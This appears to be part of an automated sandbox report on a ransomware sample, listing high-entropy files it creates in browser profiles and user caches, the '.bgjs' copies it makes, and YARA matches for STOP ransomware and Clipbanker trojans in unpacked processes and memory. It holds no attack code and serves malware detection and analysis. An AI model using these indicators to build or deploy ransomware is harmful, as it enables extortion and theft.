Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fe191046-14e8-4e49-a1f5-f429b2cab500}\0.0.filtertrie.intermediate.txt entropy: 7.99494323525
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fe191046-14e8-4e49-a1f5-f429b2cab500}\Apps.ft entropy: 7.99625430983
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite entropy: 7.99782047452
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm entropy: 7.99440118908
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extensions.json entropy: 7.99564797422
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm entropy: 7.99484848224
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite entropy: 7.99794244234
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\settingsglobals.txt entropy: 7.99603497915
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\settingssynonyms.txt entropy: 7.99831612302
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99424341354
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite entropy: 7.99758801283
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm entropy: 7.99400985366
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99856327341
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm entropy: 7.99372797459
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite entropy: 7.99811281887
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99781333085
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99867362714
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99845883427
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db entropy: 7.99579507464
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico entropy: 7.99733099531
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml entropy: 7.9923683457
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99752940284
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99233122789
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm entropy: 7.99438488563
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.99834613663
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99768010462
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99448189766
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7[1].js entropy: 7.99191962208
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7[1].js entropy: 7.99454333944
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml entropy: 7.99400170358
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\sharedscripts-939520eada[1].js entropy: 7.99602027292
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\DL2P1Z6X\staticpwascripts-30998bff8f[1].js entropy: 7.99151353087
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\pwa-bootstrap-5e7af218e953d095fabf[1].js entropy: 7.99747176827
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\pwa-bundle-994d8943fc9264e2f8d3[1].css entropy: 7.99797401094
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\otel-logger-104bffe9378b8041455c[1].js entropy: 7.99803845753
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\IINQQITY\thirdpartynotice[1].htm entropy: 7.99812169117
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\hero-image-desktop-f6720a4145[1].jpg entropy: 7.99869458876
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\microsoft-365-logo-01d5ecd01a[1].png entropy: 7.99165732054
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7[1].css entropy: 7.99572126397
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js entropy: 7.99606946202
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\bootstrap_3.3.0_B68S-_daR6nLiLVZsh4XiA2[1].js entropy: 7.99503242913
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2[1].js entropy: 7.99200572659
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\LCNHN4MU\pwa-mru.9ba2d4c9e339ba497e10.chunk.v7[1].js entropy: 7.99576473501
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\AC\INetCache\GOGXYOSL\1446_8.53.0[1].json entropy: 7.99868349208
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\DLAKQVF0\accountcorepackage_7RPOlbJQzUEPp9Cr7jKSkg2[1].js entropy: 7.99674148084
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js entropy: 7.99783392581
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\HSLUET3E\knockout_old_GJ62c6D9R5HuKFdkoO8XYw2[1].js entropy: 7.99765016412
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\I8BK050T\jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js entropy: 7.998077835
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\I8BK050T\lwsignuphoststringscountrybirthdate_en-gb_tXeUWmrL4gUQDx-AaHVz2g2[1].js entropy: 7.99465943577
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99719653437
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99602168894
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99243757391
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.9926170532
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.9922022504
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99238683786
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99339908654
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000010.db entropy: 7.99828637478
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000011.db entropy: 7.99830563002
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db entropy: 7.99741106909
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99820591351
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99297719272
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99719262863
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Local\IconCache.db entropy: 7.99306300377
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\Local Settings\IconCache.db.bgjs (copy) entropy: 7.99306300377
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\Local Settings\Temp\wctEA40.tmp.bgjs (copy) entropy: 7.99762679
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.bgjs (copy) entropy: 7.99752940284
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgjs (copy) entropy: 7.99233122789
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm.bgjs (copy) entropy: 7.99438488563
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgjs (copy) entropy: 7.99719653437
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgjs (copy) entropy: 7.99602168894
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.bgjs (copy) entropy: 7.99243757391
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.bgjs (copy) entropy: 7.9926170532
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.bgjs (copy) entropy: 7.9922022504
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.bgjs (copy) entropy: 7.99238683786
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.bgjs (copy) entropy: 7.99339908654
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000010.db.bgjs (copy) entropy: 7.99828637478
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000011.db.bgjs (copy) entropy: 7.99830563002
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.bgjs (copy) entropy: 7.99741106909
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.bgjs (copy) entropy: 7.99820591351
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.bgjs (copy) entropy: 7.99297719272
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.bgjs (copy) entropy: 7.99719262863
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199673019888[1].htm entropy: 7.99525587095

System Summary

Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
